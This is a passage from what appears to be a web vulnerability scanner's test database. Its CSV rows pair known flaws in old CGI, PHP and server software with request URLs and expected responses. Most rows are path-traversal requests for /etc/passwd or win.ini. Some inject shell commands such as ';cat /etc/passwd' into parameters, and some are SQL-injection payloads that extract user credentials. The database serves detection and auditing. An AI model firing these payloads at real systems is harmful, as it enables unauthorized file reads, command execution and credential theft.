files.\",\"\",\"\"\n\"000574\",\"0\",\"5\",\"/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read files on the host.\",\"\",\"\"\n\"000575\",\"0\",\"5\",\"/viewpage.php?file=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"PHP-Nuke script viewpage.php allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000576\",\"431\",\"5\",\"/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name.\",\"\",\"\"\n\"000577\",\"9055\",\"5\",\"/webMathematica/MSP?MSPStoreID=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini&MSPStoreType=image/gif\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/\",\"\",\"\"\n\"000578\",\"9055\",\"5\",\"/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/\",\"\",\"\"\n\"000579\",\"14345\",\"5\",\"@CGIDIRSadmin.cgi?list=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Add2it Mailman Free V1.73 allows arbitrary files to be retrieved.\",\"\",\"\"\n\"000580\",\"0\",\"5\",\"@CGIDIRS14all.cgi?cfg=../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000581\",\"0\",\"5\",\"@CGIDIRS14all-1.1.cgi?cfg=../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000582\",\"533\",\"5\",\"@CGIDIRSanacondaclip.pl?template=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This allows attackers to read arbitrary files from the server.\",\"\",\"\"\n\"000583\",\"0\",\"5\",\"@CGIDIRSauktion.cgi?menue=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The CGI allows attackers to read arbitrary files remotely.\",\"\",\"\"\n\"000584\",\"0\",\"5\",\"@CGIDIRSbigconf.cgi?command=view_textfile&file=/etc/passwd&filters=\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"000585\",\"0\",\"5\",\"@CGIDIRSbb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system.\",\"\",\"\"\n\"000586\",\"0\",\"5\",\"@CGIDIRSbb-hist?HISTFILE=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.\",\"\",\"\"\n\"000587\",\"0\",\"5\",\"@CGIDIRSbb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.\",\"\",\"\"\n\"000588\",\"0\",\"5\",\"@CGIDIRScommon.php?f=0&ForumLang=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read files on the host.\",\"\",\"\"\n\"000589\",\"0\",\"5\",\"@CGIDIRScommerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000590\",\"0\",\"5\",\"@CGIDIRScgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000591\",\"0\",\"5\",\"@CGIDIRScal_make.pl?p0=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"000592\",\"0\",\"5\",\"@CGIDIRSdb4web_c/dbdirname//etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The passwd file was retrieved by using the db4web executable.\",\"\",\"\"\n\"000593\",\"563\",\"5\",\"@CGIDIRSdirectorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000594\",\"5161\",\"5\",\"@CGIDIRSemumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000595\",\"5161\",\"5\",\"@CGIDIRSemumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000596\",\"5161\",\"5\",\"@CGIDIRSemu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000597\",\"0\",\"5\",\"@CGIDIRSfaxsurvey?cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands and read files remotely.\",\"\",\"\"\n\"000598\",\"699\",\"5\",\"@CGIDIRSfaqmanager.cgi?toc=/etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version: http://www.fourteenminutes.com/code/faqmanager/\",\"\",\"\"\n\"000599\",\"4969\",\"5\",\"@CGIDIRSezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EZShopper search CGI allows arbitrary files to be read\",\"\",\"\"\n\"000600\",\"0\",\"5\",\"@CGIDIRSformmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to retrieve arbitrary files from the server.\",\"\",\"\"\n\"000601\",\"0\",\"5\",\"@CGIDIRSformmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to retrieve arbitrary files from the server.\",\"\",\"\"\n\"000602\",\"603\",\"5\",\"@CGIDIRSgenerate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"This CGI from SIX webboard allows attackers read arbitrary files on the host.\",\"\",\"\"\n\"000603\",\"603\",\"5\",\"@CGIDIRSgenerate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"This CGI from SIX webboard allows attackers read arbitrary files on the host.\",\"\",\"\"\n\"000604\",\"603\",\"5\",\"@CGIDIRSgenerate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI from SIX webboard allows attackers read arbitrary files on the host.\",\"\",\"\"\n\"000605\",\"0\",\"5\",\"@CGIDIRShtmlscript?../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000606\",\"0\",\"5\",\"@CGIDIRShtgrep?file=index.html&hdr=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000607\",\"0\",\"5\",\"@CGIDIRShsx.cgi?show=../../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000608\",\"0\",\"5\",\"@CGIDIRSsewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Default scripts can allow arbitrary access to the host.\",\"\",\"\"\n\"000609\",\"2511\",\"5\",\"@CGIDIRSsbcgi/sitebuilder.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SITEBUILDER v1.4 may allow retrieval of any file. With a valid username and password, request: /<CGIDIR>/sbcgi/sitebuilder.cgi?username=<user>&password=<password>&selectedpage=../../../../../../../../../../etc/passwd\",\"\",\"\"\n\"000610\",\"0\",\"5\",\"@CGIDIRSmrtg.cgi?cfg=../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000611\",\"0\",\"5\",\"@CGIDIRSmrtg.cfg?cfg=../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000612\",\"0\",\"5\",\"@CGIDIRSmain.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files remotely.\",\"\",\"\"\n\"000613\",\"8192\",\"5\",\"@CGIDIRSmail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"MailReader.com v2.3.31 web package allows remote users to retrieve any system file.\",\"\",\"\"\n\"000614\",\"5161\",\"5\",\"@CGIDIRSmail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000615\",\"0\",\"5\",\"@CGIDIRSloadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"000616\",\"0\",\"5\",\"@CGIDIRSloadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"000617\",\"89\",\"5\",\"@CGIDIRShtsearch?exclude=%60/etc/passwd%60\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000618\",\"0\",\"5\",\"@CGIDIRSshop.cgi?page=../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file read retrieval.\",\"\",\"\"\n\"000619\",\"0\",\"5\",\"@CGIDIRSsendtemp.pl?templ=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000620\",\"0\",\"5\",\"@CGIDIRSsearch/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\",\"GET\",\"resolv\\.conf\",\"\",\"\",\"\",\"\",\"It is possible to read files on the remote server, this CGI should be removed.\",\"\",\"\"\n\"000621\",\"521\",\"5\",\"@CGIDIRSsearch.pl?form=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The ROADS search.pl allows attackers to retrieve system files.\",\"\",\"\"\n\"000622\",\"0\",\"5\",\"@CGIDIRSsearch.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000623\",\"0\",\"5\",\"@CGIDIRSsearch.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000624\",\"0\",\"5\",\"@CGIDIRSquickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the remote system.\",\"\",\"\"\n\"000625\",\"0\",\"5\",\"@CGIDIRSpublisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"AHG's search.cgi allows any command to be executed. www.ahg.com.\",\"\",\"\"\n\"000626\",\"0\",\"5\",\"@CGIDIRSphp.cgi?/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This allows attackers to read arbitrary files on the system and perhaps execute commands.\",\"\",\"\"\n\"000627\",\"0\",\"5\",\"@CGIDIRSpals-cgi?palsAction=restart&documentName=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows remote users to read system files.\",\"\",\"\"\n\"000628\",\"0\",\"5\",\"@CGIDIRSopendir.php?/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read any file on the web server.\",\"\",\"\"\n\"000629\",\"5161\",\"5\",\"@CGIDIRSnph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000630\",\"483\",\"5\",\"@CGIDIRSnewsdesk.cgi?t=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to view arbitrary files on the server.\",\"\",\"\"\n\"000631\",\"393\",\"5\",\"@CGIDIRSnetauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to view arbitrary files on the server.\",\"\",\"\"\n\"000632\",\"415\",\"5\",\"@CGIDIRSmultihtml.pl?multi=/etc/passwd%00html\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files on the host. May also allow a shell to be spawned using http://www.packetstormsecurity.org/0009-exploits/multihtml.c\",\"\",\"\"\n\"000633\",\"235\",\"5\",\"@CGIDIRSwebdist.cgi?distloc=;cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read files remotely.\",\"\",\"\"\n\"000634\",\"506\",\"5\",\"@CGIDIRSway-board/way-board.cgi?db=/etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Allows attackers to read arbitrary files from the server.\",\"\",\"\"\n\"000635\",\"506\",\"5\",\"@CGIDIRSway-board.cgi?db=/etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Allows attackers to read arbitrary files from the server.\",\"\",\"\"\n\"000637\",\"0\",\"5\",\"@CGIDIRSviewsource?/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Allows attacker to retrieve arbitrary files.  Remove from CGI directory.\",\"\",\"\"\n\"000638\",\"0\",\"5\",\"@CGIDIRSttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Tarantell TTAWeb Top CGI lets remote users read arbitrary files.\",\"\",\"\"\n\"000639\",\"0\",\"5\",\"@CGIDIRStraffic.cgi?cfg=../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000640\",\"0\",\"5\",\"@CGIDIRStechnote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files remotely.\",\"\",\"\"\n\"000641\",\"7715\",\"5\",\"@CGIDIRStalkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Talkback CGI displays arbitrary files\",\"\",\"\"\n\"000642\",\"683\",\"5\",\"@CGIDIRSstory/story.pl?next=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"story.pl versions older than 1.4 allow any file to be read remotely.\",\"\",\"\"\n\"000643\",\"683\",\"5\",\"@CGIDIRSstory.pl?next=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"story.pl versions older than 1.4 allow any file to be read remotely.\",\"\",\"\"\n\"000644\",\"0\",\"5\",\"@CGIDIRSstore/index.cgi?page=../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"CommerceSQL allows reading of arbitrary files. Default login/pass is username/password.\",\"\",\"\"\n\"000645\",\"0\",\"5\",\"@CGIDIRSstore.cgi?StartID=../../../../../../../../../../etc/passwd%00.html\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files remotely.\",\"\",\"\"\n\"000646\",\"0\",\"5\",\"@CGIDIRSssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The server install allows reading of any system file by sending encoded '../' directives.\",\"\",\"\"\n\"000647\",\"265\",\"5\",\"@CGIDIRSsojourn.cgi?cat=../../../../../../../../../../etc/password%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files.\",\"\",\"\"\n\"000648\",\"0\",\"5\",\"@CGIDIRSsimple/view_page?mv_arg=|cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands on the host as the HTTP daemon owner.\",\"\",\"\"\n\"000649\",\"432\",\"5\",\"@CGIDIRSshopper.cgi?newpage=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Versions 1 and 2 of Byte's Interactive Web Shopper allow attackers to read files remotely. Uncomment the #$debug=1 variable.\",\"\",\"\"\n\"000650\",\"17110\",\"5\",\"/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.\",\"\",\"\"\n\"000651\",\"0\",\"5\",\"/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Webcalendar 0.9.41 and below allow remote users to read arbitrary files.\",\"\",\"\"\n\"000652\",\"15392\",\"5\",\"/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Wordit Limited 2000 allows command execution.\",\"\",\"\"\n\"000653\",\"0\",\"5\",\"@CGIDIRSsawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file retrieval.\",\"\",\"\"\n\"000654\",\"59084\",\"5\",\"/page.cgi?../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval.\",\"\",\"\"\n\"000655\",\"56290\",\"5\",\"/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EditTag allows arbitrary file retrieval.\",\"\",\"\"\n\"000656\",\"8983\",\"5\",\"/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Remote file retrieval.\",\"\",\"\"\n\"000659\",\"693\",\"5\",\"@CGIDIRSzml.cgi?file=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Ztreet Markup Language interpreter allows arbitrary files to be read remotely.\",\"\",\"\"\n\"000660\",\"0\",\"5\",\"@CGIDIRSYaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI lets users read any file with http daemon's permissions. Upgrade to latest version\",\"\",\"\"\n\"000661\",\"242\",\"5\",\"@CGIDIRSwhois_raw.cgi?fqdn=%0Acat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Allows attacker to view any file (and possibly execute commands). Upgrade to latest version\",\"\",\"\"\n\"000662\",\"0\",\"5\",\"@CGIDIRSwhois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The whois.cgi allows any command to be executed on the system.\",\"\",\"\"\n\"000663\",\"0\",\"5\",\"@CGIDIRSwhois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The whois.cgi allows any command to be executed on the system.\",\"\",\"\"\n\"000664\",\"512\",\"5\",\"@CGIDIRSwebspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read arbitrary files.\",\"\",\"\"\n\"000665\",\"0\",\"5\",\"@CGIDIRSwebplus?script=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to retrieve files remotely.\",\"\",\"\"\n\"000666\",\"0\",\"5\",\"@CGIDIRSwebmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000667\",\"16861\",\"8\",\"/athenareg.php?pass=%20;cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Athena web registration remote command execution.\",\"\",\"\"\n\"000668\",\"278\",\"7\",\"/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This default Netscape file allows an attacker to read arbitrary files on the host.\",\"\",\"\"\n\"000669\",\"0\",\"5\",\"/search?NS-query-pat=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+\",\"\",\"\"\n\"000670\",\"0\",\"5\",\"/search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+\",\"\",\"\"\n\"000671\",\"0\",\"7\",\"/..\\..\\..\\..\\..\\..\\temp\\temp.class\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.\",\"\",\"\"\n\"000672\",\"0\",\"7\",\"/../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"It is possible to read files on the server by adding ../ in front of file name.\",\"\",\"\"\n\"000673\",\"0\",\"7\",\"/.../.../.../.../.../.../.../.../.../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?\",\"\",\"\"\n\"000674\",\"0\",\"7\",\"/................../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The web server allows the password file to be retrieved.\",\"\",\"\"\n\"000675\",\"0\",\"3\",\"/%3f.jsp\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.\",\"\",\"\"\n\"000677\",\"388\",\"7\",\"/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.\",\"\",\"\"\n\"000678\",\"0\",\"7\",\"/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org).\",\"\",\"\"\n\"000679\",\"0\",\"3\",\"/%00\",\"GET\",\"File Name\",\"\",\"\",\"\",\"\",\"Appending /%00 to a request to the web server may reveal a directory listing.\",\"\",\"\"\n\"000680\",\"0\",\"7\",\"/ca//\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"It is possible to read files on the server by adding through directory traversal by adding multiple /\\\\.. in front of file name.\",\"\",\"\"\n\"000681\",\"0\",\"7\",\"/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"It is possible to read files on the server by adding through directory traversal by adding multiple /\\\\.. in front of file name.\",\"\",\"\"\n\"000682\",\"0\",\"7\",\"/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"It is possible to read files on the server by adding through directory traversal by adding multiple /\\\\.. in front of file name.\",\"\",\"\"\n\"000683\",\"728\",\"9\",\"/admentor/adminadmin.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =\",\"\",\"\"\n\"000684\",\"36894\",\"9\",\"@NUKEMy_eGallery/public/displayCategory.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.\",\"\",\"\"\n\"000685\",\"0\",\"9\",\"@CGIDIRSclassifieds/index.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"My Classifieds pre 2.12 is vulnerable to SQL injection attacks.\",\"\",\"\"\n\"000686\",\"10105\",\"9\",\"/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x\",\"GET\",\"parse error\",\"\",\"\",\"\",\"\",\"IMP 2.x allows SQL injection, and reveals system information.\",\"\",\"\"\n\"000687\",\"9392\",\"9\",\"/userinfo.php?uid=1;\",\"GET\",\"Query\\sError:\",\"\",\"\",\"\",\"\",\"Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.\",\"\",\"\"\n\"000688\",\"0\",\"9\",\"/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"IBM Informix Web DataBlade allows remote execution of SQL\",\"\",\"\"\n\"000689\",\"0\",\"9\",\"/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Web DataBlade 4.12/Informix is vulnerable to SQL injection.\",\"\",\"\"\n\"000690\",\"0\",\"9\",\"/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*\",\"GET\",\"<r0x>\\(\\.\\+\\?\\)<r0x>\",\"\",\"\",\"\",\"\",\"My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command 